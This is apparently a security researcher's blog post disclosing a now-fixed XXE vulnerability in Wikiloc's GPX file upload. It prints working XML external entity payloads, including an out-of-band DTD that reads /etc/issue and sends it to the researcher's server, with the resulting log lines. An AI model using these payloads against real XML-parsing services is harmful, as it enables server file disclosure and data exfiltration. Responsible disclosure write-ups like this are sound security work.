For those who still don’t know Wikiloc:
Wikiloc is a place to discover and share the best outdoor trails for hiking, cycling and many other activities.
We are 1,725,606 members exploring and sharing 3,936,841 outdoor trails and 6,503,289 photos.
I was searching for a cool track to ride my bike [yes I love #cycling] and I created an account on Wikiloc.
I already known the site but never registered. Such a cool site in my opinion.
As a security researcher I always take a look on the web applications requests and transactions and after uploading a XML I remember to test Wikiloc for a XXE vulnerability. This is a very dangerous type of vulnerability and could be used by malicious users to compromise the server.
So let me explain what I did:
First I downloaded a .gpx file from Wikiloc to see the structure of the XML.
I injected the following line on top of the file:
[code language=”xml”]<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>;[/code]
And called the entity on the track name:
[code language=”xml”]<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>
<gpx
version="1.0"
creator="GPSBabel – http://www.gpsbabel.org"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.topografix.com/GPX/1/0"
xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
<name>&xxe;</name>
<trkseg>
<trkpt lat="40.737758000" lon="-8.093361000">
<ele>178.000000</ele>
<time>2009-01-10T14:18:10Z</time>
(…)
[/code]
I uploaded the .gpx file and voilá! Got a request made by Wikiloc server to my own:
GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51
To make sure that was your server I resolved the IP which was master.wikiloc.com. I also know what version of Java they were are using – 1.7.0_51.
But to show how dangerous it can be I wanted to test for external DTD and request a file hosted on Wikiloc server – /etc/issue [which will return the operating system used].
So I modified other .gpx file with the following code:
[code language=”xml”]<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % dtd SYSTEM "http://www.davidsopas.com/poc/xxe.dtd">
%dtd;]>
<gpx
version="1.0"
creator="GPSBabel – http://www.gpsbabel.org"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.topografix.com/GPX/1/0"
xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
<name>&send;</name>
(…)[/code]
xxe.dtd has the following XML code:
[code language=”xml”]<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM ‘http://www.davidsopas.com/XXE?%file;’>">
%all;
[/code]
I uploaded the new .gpx file and got the following GET request on my server:
144.76.194.66 GET /XXE/?Debian 10/29/15 1:12 PM Java/1.7.0_51
With XXE you can do a variaty of things. A malicious user could upload files, check source-code, launch DDoS attacks, you name it.
This issue its already fixed by Wikiloc. They were very fast and concerned about this. It’s shows that they care about security.
Also they provided me with a token of appreciation (they know exactly how to please a cyclist 🙂 ) and also put my name on their contributors list.
Keep up the good work Wikiloc!